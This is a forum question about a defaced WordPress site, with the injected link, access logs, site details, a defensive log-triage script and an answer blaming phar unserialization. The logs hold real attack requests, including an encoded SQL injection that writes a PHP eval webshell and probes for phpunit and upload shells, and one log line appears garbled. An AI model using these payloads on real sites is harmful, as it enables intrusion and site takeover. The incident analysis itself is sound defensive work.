Hacked WordPress /index.php and /wp-content/themes/Avada/footer.php


I woke up today to see the top and bottom of my website showing a link with the text "Cheap Jerseys Free Shipping".

I quickly logged in and saw that /index.php and /wp-content/themes/Avada/footer.php had been modified; I removed the links and saved.

I want to know how the person got access to both files so I can fix it. I have looked everywhere; can anyone let me know where else to look?

Here is what my index.php looked like before I fixed it:

<a href="http://www.example.com">Cheap Jerseys Free Shipping</a>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );

I secured my WordPress site by following the WordPress hardening guide. The site is hosted on Amazon Lightsail.

  1. Two users have SSH access: me with sudo, and VaultPress with access limited to the /web directory. SSH access is tied to an instant e-mail notification: as soon as someone logs in via SSH an e-mail is sent with the IP. The access logs show that no SSH access was granted.
  2. Two FTP users with read-only access limited to the /web/download/ and /web/update directories only.
  3. Only 1 user on WordPress, password now changed. /wp-admin has Order Allow,Deny, Allow from all, Satisfy any and password authentication where the password file is in a .directory; AuthType Basic AuthName "Admins Only" AuthUserFile "/var/www/.xxx/xxxx/xxxxxx-xx-xxx" Require valid-user. wp-config.php in the / directory has Order Allow,Deny, Deny from all.
  4. All access through the firewall is blocked except ssh, 22, 80 and 443. Database access is limited to local only.
  5. Google Tag Manager has not been modified and only includes links to Analytics, AdWords and specific click analytics.

The access logs (Apache web access) that looked suspicious are below; I don't know what they mean. The VaultPress backups show that the change happened between 28 August (2:38 AM) and 29 August (2:38 AM).

27.24.xx.xxx - - [27/Aug/2018:11:20:17 +0000] "GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=114&arrs2[]=101&arrs2[]=97&arrs2[]=100&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:23 +0000] "GET /plus/ad_js.php?aid=19 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:31 +0000] "GET /include/dialog/select_soft_post.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:33 +0000] "GET /data/cache/asd.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:39 +0000] "GET /install/index.php.bak?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/admin/config_update.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:41 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 94621
95.108.xxx.xx - - [27/Aug/2018:11:20:41 +0000] "GET /blog/xxx-xxx-xxxx-saves-lives/ HTTP/1.1" 200 103653
141.8.142.161 - - [27/Aug/2018:11:20:44 +0000] "GET /wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-solid-900.woff2 HTTP/1.1" 200 65580
95.108.xxx.xx - - [27/Aug/2018:11:20:44 +0000] "GET /blog/xxx-xxx-xxxx-saves-lives/?relatedposts=1 HTTP/1.1" 200 1426
27.24.21.214 - - [27/Aug/2018:11:20:44 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/asd.php HTTP/1.1" 404 94621
66.249.xxx.xx - - [27/Aug/2018:11:20:48 +0000] "GET /blog/xxx-xxx-xxxx-tool/ HTTP/1.1" 200 105062
27.24.xx.xxx - - [27/Aug/2018:11:20:51 +0000] "GET /index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 301 5880
27.24.xx.xxx - - [27/Aug/2018:11:20:53 +0000] "GET /?m=member&c=index&a=register&siteid=1 HTTP/1.1" 200 95434
27.24.xx.xxx - - [27/Aug/2018:11:20:57 +0000] "GET /search.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:01 +0000] "GET / HTTP/1.1" 200 103770
27.24.xx.xxx - - [27/Aug/2018:11:21:07 +0000] "GET /index.php?s=/Core/File/uploadPictureBase64.html HTTP/1.1" 200 97157
27.24.xx.xxx - - [27/Aug/2018:11:21:26 +0000] "GET /install.php?finish=1 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:29 +0000] "GET /da.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:36 +0000] "GET /dayrui/libraries/Chart/ofc_upload_image.php?name=shell9257.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:43 +0000] "GET /dayrui/libraries/tmp-upload-images/shell9257.php HTTP/1.1" 404 94621

128.77.xxx.xxx - - [29/Aug/2018:10:31:25 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
128.77.xxx.xxx - - [29/Aug/2018:10:31:27 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98345
128.77.xxx.xxx - - [29/Aug/2018:10:31:33 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
128.77.xxx.xxx - - [29/Aug/2018:10:31:35 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98330
128.77.xxx.xxx - - [29/Aug/2018:10:31:40 +0000] "GET /wp-admin HTTP/1.1" 401 735
80.122.xx.xx - - [29/Aug/2018:10:31:42 +0000] "GET / HTTP/1.1" 200 103865
66.249.xx.xxx - - [29/Aug/2018:10:31:49 +0000] "GET /robots.txt HTTP/1.1" 200 6059
80.122.xx.xxx - - [29/Aug/2018:10:31:49 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
66.249.xx.xxx - - [29/Aug/2018:10:31:50 +0000] "GET /blog/author/scott-baird/ HTTP/1.1" 301 553
80.122.xx.xx - - [29/Aug/2018:10:31:51 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98482
80.122.xx.xx - - [29/Aug/2018:10:31:57 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
80.122.xx.xx - - [29/Aug/2018:10:31:59 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98478
80.122.xx.xx - - [29/Aug/2018:10:32:03 +0000] "GET /wp-admin HTTP/1.1" 401 735
95.105.xxx.xxx - - [29/Aug/2018:10:32:15 +0000] "GET / HTTP/1.1" 200 103705
95.105.xxx.xxx - - [29/Aug/2018:10:32:27 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 5879
95.105.xxx.xxx - - [29/Aug/2018:10:32:27 +0000] "GET / HTTP/1.1" 200 103701
95.105.xxx.xxx - - [29/Aug/2018:10:32:30 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98347
95.105.xxx.xxx - - [29/Aug/2018:10:32:35 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
95.105.xxx.xxx - - [29/Aug/2018:10:32:37 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98325
95.105.xxx.xxx - - [29/Aug/2018:10:32:41 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
95.105.xxx.xxx - - [29/Aug/2018:10:32:43 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 5879
192.0.xxx.xxx - - [29/Aug/2018:10:32:44 +0000] "HEAD / HTTP/1.1" 200 5846
95.105.xxx.xxx - - [29/Aug/2018:10:32:43 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98332
95.105.xxx.xxx - - [29/Aug/2018:10:32:49 +0000] "GET /wp-admin HTTP/1.1" 401 735
95.105.xxx.xxx - - [29/Aug/2018:10:32:45 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98325
95.105.xxx.xxx - - [29/Aug/2018:10:32:51 +0000] "GET /wp-admin HTTP/1.1" 401 735
77.72.xxx.xxx - - [29/Aug/2018:10:33:12 +0000] "POST /wp-login.php HTTP/1.1" 200 10257
60.191.xxx.xxx - - [29/Aug/2018:10:33:17 +0000] "GET / HTTP/1.1" 200 84011/wp-admin/tools.php?page=string-locator&edit-file=index.php&file-reference=&file-type=core&string-locator-line=1&string-locator-path=%2Fvar%2Fwww%2Fmy-site%2Findex.php HTTP/1.1" 200 19947
119.my.ip - [email protected] [29/Aug/2018:14:38:17 +0000] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load%5B%5D=,site-icon,l10n,buttons,wp-auth-check,wp-jquery-ui-dialog,wp-color-picker,code-editor&ver=4.9.8 HTTP/1.1" 200 86794
119.my.ip - - [29/Aug/2018:14:38:17 +0000] "GET /wp-content/plugins/string-locator//resources/js/string-locator.js?ver=2.3.1 HTTP/1.1" 200 1119
119.my.ip - [email protected] [29/Aug/2018:14:38:17 +0000] "GET /wp-admin/load-scripts.php?c=0&load%5B%5D=jquery-core,jquery-migrate,utils,jquery-ui-core,jquery-ui-widget,jquery-ui-mouse,jquery-ui-sortable,underscore,wp-codemirror&ver=4.9.8 HTTP/1.1" 200 238028
119.my.ip - - [29/Aug/2018:14:38:20 +0000] "GET /wp-json/jetpack/v4/jitm?message_path=wp%3Atools_page_string-locator%3Aadmin_notices&query=page%253Dstring-locator%252Cedit-file%253Dindex.php%252Cfile-reference%253D%252Cfile-type%253Dcore%252Cstring-locator-line%253D1%252Cstring-locator-path%253D%25252Fvar%25252Fwww%25252Fmy-site%25252Findex.php&_wpnonce=e419c5f949 HTTP/1.1" 200 819
119.my.ip - [email protected] [29/Aug/2018:14:37:55 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 880
161.249.xxx.xx - - [29/Aug/2018:14:38:51 +0000] "-" 408 152
119.my.ip - [email protected] [29/Aug/2018:14:39:20 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 795
119.my.ip - [email protected] [29/Aug/2018:15:07:02 +0000] "GET /wp-admin/index.php HTTP/1.1" 200 25953

My WordPress site information

Avada Versions: 

### Avada Versions ###

Current Version: 5.6.2
Previous Version: 5.5.2  5.6.0  5.6.1

### WordPress Environment ###

Home URL: https://www.my-site.com
Site URL: https://www.my-site.com
WP Content Path: /var/www/my-site/wp-content
WP Path: /var/www/my-site/
WP Version: 4.9.8
WP Multisite: –
PHP Memory Limit: 512 MB
WP Debug Mode: –
Language: en_US

### Server Environment ###

Server Info: Apache/2.4.18 (Ubuntu)
PHP Version: 7.0.30-0ubuntu0.16.04.1. WordPress recommendation: 7.2 or above. See WordPress Requirements for details.
PHP Post Max Size: 32 MB
PHP Time Limit: 0
PHP Max Input Vars: 3000

MySQL Version: 5.7.23
Max Upload Size: 20 MB
DOMDocument: ✔
WP Remote Get: ✔
WP Remote Post: ✔
GD Library: 2.1.1

### Active Plugins (11) ###

VaultPress: by Automattic
LayerSlider WP: by Kreatura Media
Akismet Anti-Spam: by Automattic
Contact Form 7 - ZOHO CRM: by Obtain Code
Contact Form 7: by Takayuki Miyoshi
Fusion Builder: by ThemeFusion
Fusion Core: by ThemeFusion
Jetpack by WordPress.com: by Automattic
Slider Revolution: by ThemePunch
Yoast SEO Premium: by Team Yoast
WP Mail SMTP: by WPForms
posted by Waqas Tariq 29.08.2018 - 21:39
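One way to triage an Apache access log like the excerpt quoted above, as an added example that is not part of the original post: it parses the common log format, groups requests per client and flags the patterns visible in the question (bursts of 404s on paths no WordPress install serves, POSTs to wp-login.php, and 200 responses on /wp-admin from an IP that is not the site owner's). The sample log lines, the documentation-range IPs and the probe-path list are constructed for illustration.

```python
import re
from collections import defaultdict

# Apache access-log line shape used in the question (common log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$')
# Paths a WordPress install never serves: fingerprinting for other CMSes,
# leftover installers or dropped webshells (compare the 27.24.x.x burst).
SUSPECT_RE = re.compile(
    r'^/(plus|include/dialog|data/cache|install|vendor/phpunit|dayrui)/'
    r'|\.php\.bak|shell\d*\.php$|/(da|asd)\.php$')

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def triage(lines, owner_ips=(), max_404=3):
    """Return {ip: [reasons]} for clients that look like scanners or that
    reached an admin page with 200 without being a known owner IP."""
    stats = defaultdict(lambda: {"404": 0, "probe": 0, "login": 0, "admin": 0})
    for line in lines:
        r = parse_line(line)
        if not r:
            continue  # skip lines that do not parse (e.g. truncated entries)
        s = stats[r["ip"]]
        s["404"] += r["status"] == "404"
        s["probe"] += bool(SUSPECT_RE.search(r["path"]))
        s["login"] += r["method"] == "POST" and r["path"].startswith("/wp-login.php")
        s["admin"] += (r["path"].startswith("/wp-admin") and r["status"] == "200"
                       and r["ip"] not in owner_ips)
    findings = {}
    for ip, s in stats.items():
        why = []
        if s["404"] >= max_404: why.append(f"{s['404']} x 404")
        if s["probe"]: why.append(f"{s['probe']} non-WordPress probe paths")
        if s["login"]: why.append(f"{s['login']} x POST /wp-login.php")
        if s["admin"]: why.append(f"{s['admin']} x 200 on /wp-admin from non-owner IP")
        if why: findings[ip] = why
    return findings

# Constructed sample lines modelled on the question's excerpt (documentation IPs).
SAMPLE_LOG = """\
203.0.113.5 - - [27/Aug/2018:11:20:17 +0000] "GET /plus/ad_js.php?aid=19 HTTP/1.1" 404 94621
203.0.113.5 - - [27/Aug/2018:11:20:41 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 94621
203.0.113.5 - - [27/Aug/2018:11:21:43 +0000] "GET /dayrui/libraries/tmp-upload-images/shell9257.php HTTP/1.1" 404 94621
198.51.100.9 - - [29/Aug/2018:10:33:12 +0000] "POST /wp-login.php HTTP/1.1" 200 10257
192.0.2.10 - admin [29/Aug/2018:15:07:02 +0000] "GET /wp-admin/index.php HTTP/1.1" 200 25953
""".splitlines()
```

Run it over the full access log with your own IP in `owner_ips`; a 200 on /wp-admin or a successful wp-login.php POST from any other address narrows the window in which the files were edited.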

1 answer

Your site was probably attacked using the latest PHP vulnerability, File Operation Induced Unserialization via the phar:// Stream Wrapper. In short, a valid Phar archive can be uploaded to the server and a file operation triggered on that file.

If that was not the route used, check whether any of your plugins are outdated; they are the main suspects in every WordPress compromise. You can install WPScan on your computer and run it against your blog. If any plugin is not up to date, WPScan will show you.

answered 29.08.2018 - 22:04
